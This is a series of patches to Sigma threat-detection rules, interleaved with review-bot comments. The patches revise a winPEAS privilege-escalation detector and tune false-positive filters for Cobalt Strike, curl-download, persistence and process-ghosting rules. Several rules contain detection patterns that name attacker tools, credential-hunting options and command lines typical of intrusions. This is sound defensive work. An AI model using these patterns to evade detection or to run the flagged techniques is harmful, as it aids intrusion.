@@ -24,8 +24,7 @@ detection: - '\winPEASx64_ofs.exe' - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - - OriginalFileName: - - 'winPEAS.exe' # always the same + - OriginalFileName: 'winPEAS.exe' # always the same selection_cmd_args: - CommandLine|contains: - 'domain' # Enumerate domain information @@ -41,10 +40,8 @@ detection: - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files - 'eventsinfo' # Display interesting events information filter_sysinfo: - - Image|endswith: - - '\systeminfo.exe' # due to option "systeminfo" via winPEAS - - OriginalFileName: - - 'sysinfo.exe' + - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS + - OriginalFileName: 'sysinfo.exe' condition: (selection_img or selection_cmd_args) and not filter_sysinfo fields: - Image @@ -53,5 +50,5 @@ fields: - ParentCommandLine - CurrentDirectory falsepositives: - - Pentesting + - Should not be any as administrators do not use this tool level: high From 86a4f24ce8b085105c768b8f24ca6257669bfce0 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 22:36:18 +0200 Subject: [PATCH 65/96] del "domain" under CommandLine --- .../windows/process_creation/proc_creation_win_winpeas_tool.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index 92378f6ca..cc52a318a 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -27,7 +27,6 @@ detection: - OriginalFileName: 'winPEAS.exe' # always the same selection_cmd_args: - CommandLine|contains: - - 'domain' # Enumerate domain information - 'systeminfo' # Search system information - 'userinfo' # Search user information - 'processinfo' # Search processes information 
From 9bfd2c729fb9ba4c1261d8407a44266436ae2b1d Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 23:00:02 +0200 Subject: [PATCH 66/96] change condition and format --- .../process_creation/proc_creation_win_winpeas_tool.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index cc52a318a..d591a8b10 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -16,7 +16,7 @@ logsource: category: process_creation product: windows detection: - selection_img: + winpeas_basic: - Image|endswith: - '\winPEASany.exe' - '\winPEASany_ofs.exe' @@ -25,7 +25,7 @@ detection: - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - OriginalFileName: 'winPEAS.exe' # always the same - selection_cmd_args: + winpeas_option: - CommandLine|contains: - 'systeminfo' # Search system information - 'userinfo' # Search user information @@ -41,7 +41,7 @@ detection: filter_sysinfo: - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS - OriginalFileName: 'sysinfo.exe' - condition: (selection_img or selection_cmd_args) and not filter_sysinfo + condition: 1 of winpeas_* and not filter_sysinfo fields: - Image - User From 9e589736c2d2e7c106ca6cc7560f942a9e5d7170 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 23:23:28 +0200 Subject: [PATCH 67/96] Update proc_creation_win_winpeas_tool.yml --- .../proc_creation_win_winpeas_tool.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index d591a8b10..ee5604ae5 100644 
--- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -17,16 +17,16 @@ logsource: product: windows detection: winpeas_basic: - - Image|endswith: + Image|endswith: - '\winPEASany.exe' - '\winPEASany_ofs.exe' - '\winPEASx64.exe' - '\winPEASx64_ofs.exe' - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - - OriginalFileName: 'winPEAS.exe' # always the same + OriginalFileName: 'winPEAS.exe' # always the same winpeas_option: - - CommandLine|contains: + CommandLine|contains: - 'systeminfo' # Search system information - 'userinfo' # Search user information - 'processinfo' # Search processes information @@ -39,8 +39,8 @@ detection: - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files - 'eventsinfo' # Display interesting events information filter_sysinfo: - - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS - - OriginalFileName: 'sysinfo.exe' + Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS + OriginalFileName: 'sysinfo.exe' condition: 1 of winpeas_* and not filter_sysinfo fields: - Image From 137653f08a89aa27893476562ccc585b2463703a Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Tue, 20 Sep 2022 11:04:12 +0200 Subject: [PATCH 68/96] fix format and delete 'OriginalFileName' --- .../proc_creation_win_winpeas_tool.yml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index ee5604ae5..9696b83b3 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml 
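Review bot: Converting `winpeas_basic` and `filter_sysinfo` from lists to mappings turns their OR into AND: a process must now both have an image ending in one of the winPEAS names and carry `OriginalFileName: 'winPEAS.exe'`, so a renamed copy (the case `OriginalFileName` exists to catch) no longer matches, and the sysinfo filter only applies when both name fields agree. Patch 68 then deletes `OriginalFileName` from both, which settles the AND/OR question but permanently drops the renamed-binary coverage; keeping `winpeas_basic` as a list, or adding a separate `winpeas_orig: OriginalFileName: 'winPEAS.exe'` selection picked up by `1 of winpeas_*`, preserves it. The `condition` line is in the hunk; the `logsource` block above is not.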
@@ -5,8 +5,8 @@ description: WinPEAS is a script that search for possible paths to escalate priv author: Georg Lauenstein date: 2022/09/19 references: - - https://github.com/carlospolop/PEASS-ng - - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation + - https://github.com/carlospolop/PEASS-ng + - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation tags: - attack.privilege_escalation - attack.t1082 @@ -17,16 +17,15 @@ logsource: product: windows detection: winpeas_basic: - Image|endswith: + Image|endswith: - '\winPEASany.exe' - '\winPEASany_ofs.exe' - '\winPEASx64.exe' - '\winPEASx64_ofs.exe' - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - OriginalFileName: 'winPEAS.exe' # always the same winpeas_option: - CommandLine|contains: + CommandLine|contains: - 'systeminfo' # Search system information - 'userinfo' # Search user information - 'processinfo' # Search processes information @@ -39,8 +38,7 @@ detection: - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files - 'eventsinfo' # Display interesting events information filter_sysinfo: - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS - OriginalFileName: 'sysinfo.exe' + Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS condition: 1 of winpeas_* and not filter_sysinfo fields: - Image @@ -49,5 +47,5 @@ fields: - ParentCommandLine - CurrentDirectory falsepositives: - - Should not be any as administrators do not use this tool + - Unlikely level: high From 2f7a54cc3176d0f9a0face8280509d0c65f9e044 Mon Sep 17 00:00:00 2001 
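Review bot: Deleting `OriginalFileName: 'winPEAS.exe'` leaves `winpeas_basic` keyed on the file name alone, which is exactly the attribute a renamed copy does not carry, whereas the PE header's original name survives a rename; it is worth keeping as its own selection (`winpeas_pe:` with `OriginalFileName: 'winPEAS.exe'`) instead of removing it. PATCH 70 later in this series reinstates it as `selection_pe`, so the point only applies to this intermediate state. The `falsepositives` change to `- Unlikely` also loses the reasoning the previous sentence gave; a short justification reads better than a bare adverb.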
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 20 Sep 2022 11:20:33 +0200 Subject: [PATCH 69/96] Fix FP --- ...vent_win_notepad_plus_plus_persistence.yml | 6 ++-- ...oad_side_load_from_non_system_location.yml | 3 ++ .../image_load_uipromptforcreds_dlls.yml | 17 +++++++---- ...ccess_win_direct_syscall_ntopenprocess.yml | 14 ++++++++- ...tion_win_cobaltstrike_process_patterns.yml | 29 +++++++++++-------- .../proc_creation_win_mstsc.yml | 6 ++-- ...ation_win_ntfs_short_name_path_use_cli.yml | 7 +++-- .../proc_creation_win_reg_add_run_key.yml | 6 ++-- .../proc_creation_win_susp_curl_download.yml | 13 +++++++-- ...susp_direct_asep_reg_keys_modification.yml | 1 + ...ation_win_susp_explorer_break_proctree.yml | 11 +++++-- .../proc_creation_win_susp_image_missing.yml | 4 ++- .../proc_creation_win_susp_non_exe_image.yml | 3 +- ...proc_creation_win_susp_squirrel_lolbin.yml | 5 +++- .../proc_creation_win_system_exe_anomaly.yml | 6 ++-- ...ion_win_windows_terminal_susp_children.yml | 4 +++ .../registry_event_runonce_persistence.yml | 2 +- 17 files changed, 98 insertions(+), 39 deletions(-) diff --git a/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml b/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml index 96e397ca5..d684b222a 100644 --- a/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml +++ b/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml @@ -6,7 +6,7 @@ author: Nasreddine Bencherchali references: - https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/ date: 2022/06/10 -modified: 2022/06/21 +modified: 2022/09/20 logsource: product: windows category: file_event 
@@ -20,7 +20,9 @@ detection: # This filter is for Sigma dataset you could remove it or change when using the rule in your own env Image|startswith: 'C:\Users\' Image|contains: '\AppData\Local\Temp\' - Image|endswith: '\target.exe' + Image|endswith: + - '\target.exe' + - 'Installer.x64.exe' condition: selection and not 1 of filter* falsepositives: - Possible FPs during first installation of Notepad++ diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml index acbbd1f87..de8fc8740 100644 --- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml +++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml @@ -421,6 +421,9 @@ detection: filter_appvpolicy: ImageLoaded: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll Image: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe + filter_dell: + Image: 'C:\Windows\System32\backgroundTaskHost.exe' + ImageLoaded|startswith: 'C:\Program Files\WindowsApps\DellInc.DellSupportAssistforPCs' condition: selection and not 1 of filter_* falsepositives: - Legitimate applications loading their own versions of the DLLs mentioned in this rule diff --git a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml index e82154a0b..a9e409fd4 100644 --- a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml +++ b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml @@ -3,7 +3,7 @@ id: 9ae01559-cf7e-4f8e-8e14-4c290a1b4784 description: Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it. status: experimental date: 2020/10/20 -modified: 2022/08/13 +modified: 2022/09/20 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.credential_access 
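Review bot: The new filter value `'Installer.x64.exe'` has no leading backslash, so under `Image|endswith` it excludes every executable under `\AppData\Local\Temp\` whose file name merely ends in that string, not only the Notepad++ installer. If the omission is deliberate because the installer name carries a version prefix (presumably `npp.<version>.Installer.x64.exe`), `'.Installer.x64.exe'` keeps that match while rejecting other names that happen to end in `Installer.x64.exe`, and an inline comment naming the binary the entry is for would make the intent visible. The `filter` block this entry belongs to begins above the hunk.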
@@ -27,18 +27,23 @@ detection: filter_start: Image|startswith: - 'C:\Windows\System32\' - - 'C:\Windows\explorer.exe' + - 'C:\Windows\SysWOW64\' - 'C:\Program Files\' - 'C:\Program Files (x86)\' filter_end: Image|endswith: '\opera_autoupdate.exe' filter_full: - Image: 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe' + Image: + - 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe' + - 'C:\Windows\explorer.exe' filter_user: Image|startswith: 'C:\Users\' - Image|endswith: '\AppData\Roaming\Spotify\Spotify.exe' - filter_path: - Image|contains: '\Local\Microsoft\OneDrive\' + Image|endswith: + - '\AppData\Roaming\Spotify\Spotify.exe' + - '\AppData\Local\Microsoft\Teams\current\Teams.exe' + filter_contains: + Image|startswith: 'C:\Users\' + Image|contains: '\AppData\Local\Microsoft\OneDrive\' condition: selection and not 1 of filter_* falsepositives: - Other legitimate processes loading those DLLs in your environment. diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml index e1587a4f6..c0a3ec60a 100755 --- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml @@ -6,7 +6,7 @@ references: status: experimental author: Christian Burkard, Tim Shelton date: 2021/07/28 -modified: 2022/09/18 +modified: 2022/09/20 logsource: category: process_access product: windows 
@@ -32,6 +32,18 @@ detection: falsepositive6: TargetImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' SourceImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' + falsepositive7: # VsCode + TargetImage|endswith: '\AppData\Local\Programs\Microsoft VS Code\Code.exe' + SourceImage|endswith: '\AppData\Local\Programs\Microsoft VS Code\Code.exe' + falsepositive8: # Google Chrome + TargetImage|endswith: 'C:\Program Files\Google\Chrome\Application\chrome.exe' + SourceImage|endswith: 'C:\Program Files\Google\Chrome\Application\chrome.exe' + falsepositive9: # Google Chrome Update + TargetImage|endswith: 'C:\Program Files (x86)\Google\Update\GoogleUpdate.exe' + SourceImage|endswith: 'C:\Program Files (x86)\Google\Update\GoogleUpdate.exe' + falsepositive10: # MS Teams + TargetImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' + SourceImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls' condition: selection and not 1 of falsepositive* diff --git a/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml b/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml index 851989769..f4328767e 100644 --- a/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml +++ b/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml 
@@ -7,34 +7,39 @@ references: - https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/ - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ date: 2021/07/27 -modified: 2022/03/05 +modified: 2022/09/20 tags: - attack.execution - - attack.t1059 + - attack.t1059 logsource: category: process_creation product: windows detection: - selection1: + selection1: CommandLine|contains: '\cmd.exe /C whoami' ParentImage|startswith: 'C:\Temp' selection2: - CommandLine|contains: 'conhost.exe 0xffffffff -ForceV1' - ParentCommandLine|contains: - - '/C whoami' - - 'cmd.exe /C echo' - - ' > \\\\.\\pipe' - selection3: - CommandLine|contains: + CommandLine|contains: - 'cmd.exe /c echo' - '> \\\\.\\pipe' - '\whoami.exe' ParentImage|endswith: '\dllhost.exe' - selection4: + selection3: Image|endswith: '\cmd.exe' ParentImage|endswith: '\runonce.exe' ParentCommandLine|endswith: '\runonce.exe' - condition: 1 of selection* + selection_special1: + CommandLine|contains: 'conhost.exe 0xffffffff -ForceV1' + ParentCommandLine|contains: + - '/C whoami' + - 'cmd.exe /C echo' + - ' > \\\\.\\pipe' + filter_special1: + # Internet Download Manager - Chrome Extension + ParentCommandLine|contains: + - 'C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe' + - 'chrome-extension://' + condition: 1 of selection* and (selection_special1 and not filter_special1) falsepositives: - Other programs that cause these patterns (please report) level: high diff --git a/rules/windows/process_creation/proc_creation_win_mstsc.yml b/rules/windows/process_creation/proc_creation_win_mstsc.yml index e7200ba8f..20df29533 100644 --- a/rules/windows/process_creation/proc_creation_win_mstsc.yml +++ b/rules/windows/process_creation/proc_creation_win_mstsc.yml 
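Review bot: The new condition `1 of selection* and (selection_special1 and not filter_special1)` no longer lets selection1–selection3 fire on their own: the `selection*` wildcard also matches `selection_special1`, and the outer `and` makes `selection_special1` mandatory for every hit, so the three plain selections are effectively dead. Since the goal is to exclude the IDM false positive from the conhost pattern only, `condition: (selection1 or selection2 or selection3) or (selection_special1 and not filter_special1)` keeps the original coverage; renaming `selection_special1` so it falls outside the `selection*` glob would work as well. The `- attack.t1059` change is indentation only.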
@@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc date: 2022/01/07 -modified: 2022/06/12 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -25,7 +25,9 @@ detection: - ' /g' - ' /u' - ' /p' - condition: all of selection_mstsc* or all of selection_cmdkey* + filter_mstsc_1: + ParentImage: 'C:\Windows\System32\lxss\wslhost.exe' + condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey* falsepositives: - Unknown level: medium diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml index 6fe080f91..e09469b62 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/frack113/status/1555830623633375232 date: 2022/08/07 -modified: 2022/09/12 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -22,8 +22,9 @@ detection: - '~2\' filter: - ParentImage: - - C:\Windows\System32\Dism.exe - - C:\Windows\System32\cleanmgr.exe + - 'C:\Windows\System32\Dism.exe' + - 'C:\Windows\System32\cleanmgr.exe' + - 'C:\Program Files\GPSoftware\Directory Opus\dopus.exe' - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' diff --git a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml index ef9ededa7..ad770a245 100644 
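Review bot: `condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey*` relies on `and` binding tighter than `or`; it parses as intended, but a reader has to know Sigma's operator precedence to see that the new WSL filter applies only to the mstsc branch. `condition: (all of selection_mstsc* and not 1 of filter_mstsc_*) or all of selection_cmdkey*` makes that explicit at no cost.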
--- a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml @@ -12,13 +12,15 @@ logsource: product: windows detection: selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'reg' - ' ADD ' - 'Software\Microsoft\Windows\CurrentVersion\Run' condition: selection falsepositives: - - Unknown + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. + - Legitimate administrator sets up autorun keys for legitimate reasons. + - Discord level: medium tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml index 5ca802523..67f7c265e 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml @@ -9,7 +9,7 @@ references: - https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt - https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/ date: 2020/07/03 -modified: 2022/09/13 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -41,7 +41,16 @@ detection: - ' -O' # covers the alias for --remote-name and --output - '--remote-name' - '--output' - condition: selection_curl and 1 of selection_susp* + filter_git_windows: + ParentImage: 'C:\Program Files\Git\usr\bin\sh.exe' + ParentCommandLine|contains|all: + - 'git-update-git-for-windows' + - '--quiet --gui' + Image: 'C:\Program Files\Git\mingw64\bin\curl.exe' + CommandLine|contains|all: + - '--silent --show-error --output ' + - 'gfw-httpget-' + condition: selection_curl and 1 of selection_susp* and not 1 of filter_* fields: - CommandLine - ParentCommandLine 
diff --git a/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml b/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml index 421e0f538..fa812d78b 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml @@ -29,6 +29,7 @@ fields: falsepositives: - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. - Legitimate administrator sets up autorun keys for legitimate reasons. + - Discord level: medium tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml b/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml index 880093006..64bd7a5e7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml 
@@ -2,21 +2,26 @@ title: Explorer Process Tree Break id: 949f1ffb-6e85-4f00-ae1e-c3c5b190d605 status: test description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" -author: Florian Roth, Nasreddine Bencherchali +author: 'Florian Roth, Nasreddine Bencherchali, @gott_cyber' references: - https://twitter.com/CyberRaiju/status/1273597319322058752 - https://twitter.com/bohops/status/1276357235954909188?s=12 - https://twitter.com/nas_bench/status/1535322450858233858 - https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/ date: 2019/06/29 -modified: 2022/06/14 +modified: 2022/09/20 logsource: category: process_creation product: windows detection: selection: # See CLSID_SeparateMultipleProcessExplorerHost in the registry for reference - CommandLine|contains: '/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}' + - CommandLine|contains: '/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}' # This will catch, the new explorer spawning which indicates a process/tree break. But you won't be able to catch the executing process. For that you need historical data + # There is exists almost infinite possibilities to spawn from explorer. The "/root" flag is just an example + # It's better to have the ability to look at the process tree and look for explorer processes with "weird" flags to be able to catch this technique. + - CommandLine|contains|all: + - 'explorer.exe' + - ' /root,' condition: selection falsepositives: - Unknown how many legitimate software products use that method diff --git a/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml b/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml index 05d19eed8..f01b13a1f 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml 
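Review bot: The second selection (`CommandLine|contains|all` of `'explorer.exe'` and `' /root,'`) widens the rule from the specific `/factory,{CLSID}` marker to any explorer invocation carrying `/root,`, yet `falsepositives` still only refers to "that method" and the unchanged `description` still describes the factory case alone; add a line such as `- Legitimate launches of explorer.exe with the /root, switch (shortcuts, scripts)` or split the `/root,` pattern into its own rule with its own level. The inline comment `There is exists almost infinite possibilities to spawn from explorer` should read `There are almost infinite ways to spawn from explorer`, and the long explanatory comments after the first list entry would fit better in `description` than on a selection line.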
+++ b/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml @@ -4,7 +4,7 @@ status: experimental description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) author: Max Altgelt date: 2021/12/09 -modified: 2022/03/08 +modified: 2022/09/20 references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ tags: @@ -25,9 +25,11 @@ detection: - Image: - 'Registry' - 'MemCompression' + - 'vmmem' - CommandLine: - 'Registry' - 'MemCompression' + - 'vmmem' condition: not image_absolute_path and not 1 of filter* falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml b/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml index d89582a80..e8b55f8fe 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml @@ -4,7 +4,7 @@ status: experimental description: Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process) author: Max Altgelt date: 2021/12/09 -modified: 2022/06/20 +modified: 2022/09/20 references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ tags: @@ -23,6 +23,7 @@ detection: Image: - 'Registry' - 'MemCompression' + - 'vmmem' filter_empty: Image: - '-' diff --git a/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml b/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml index 7912a646f..911c0d961 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml 
@@ -11,7 +11,7 @@ tags: - attack.t1218 author: Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community date: 2019/11/12 -modified: 2022/08/23 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -32,6 +32,9 @@ detection: - CommandLine|contains|all: - 'C:\Users\' - '\AppData\Local\GitHubDesktop\Update.exe --createShortcut GitHubDesktop.exe' + - CommandLine|contains|all: + - 'C:\Users\' + - '\AppData\Local\GitHubDesktop\Update.exe --processStartAndWait GitHubDesktop.exe' - CommandLine|contains|all: - 'C:\Users\' - '\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"' diff --git a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml index e9ec591cf..14d2cd03e 100644 --- a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml +++ b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/GelosSnake/status/934900723426439170 author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali date: 2017/11/27 -modified: 2022/09/07 +modified: 2022/09/20 tags: - attack.defense_evasion - attack.t1036 @@ -71,7 +71,9 @@ detection: - 'C:\Windows\WinSxS\' # - 'C:\avast! sandbox' - Image|contains: '\SystemRoot\System32\' - - Image: 'C:\Windows\explorer.exe' + - Image: + - 'C:\Windows\explorer.exe' + - 'C:\Program Files\PowerShell\7\pwsh.exe' condition: selection and not filter fields: - ComputerName diff --git a/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml b/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml index 38dea0b0b..92a7a55f9 100644 --- a/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml +++ b/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml 
@@ -47,6 +47,10 @@ detection: CommandLine|contains|all: - '\AppData\Local\Packages\Microsoft.WindowsTerminal_' - '\LocalState\settings.json' + filter_vsdevcmd: + CommandLine|contains|all: + - 'C:\Program Files\Microsoft Visual Studio\' + - '\Common7\Tools\VsDevCmd.bat' condition: all of selection_* and not 1 of filter_* falsepositives: - Other legitimate "Windows Terminal" profiles diff --git a/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml b/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml index a998c6b34..1fc7bde2f 100644 --- a/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml +++ b/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml @@ -17,7 +17,7 @@ detection: TargetObject|endswith: '\StubPath' filter_chrome: Details|startswith: '"C:\Program Files\Google\Chrome\Application\' - Details|endswith: '\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level' + Details|contains: '\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level' # In some cases the Details will contain an additional flag called "--channel=stable" at the end filter_edge: Details|startswith: - '"C:\Program Files (x86)\Microsoft\Edge\Application\' From cb09f9d522576dabfc2af60e4919bee331ce610b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 20 Sep 2022 17:44:56 +0200 Subject: [PATCH 70/96] Update proc_creation_win_winpeas_tool.yml --- .../proc_creation_win_winpeas_tool.yml | 27 ++++++------------- 1 file changed, 8 insertions(+), 19 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index 9696b83b3..0b34ea85c 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml 
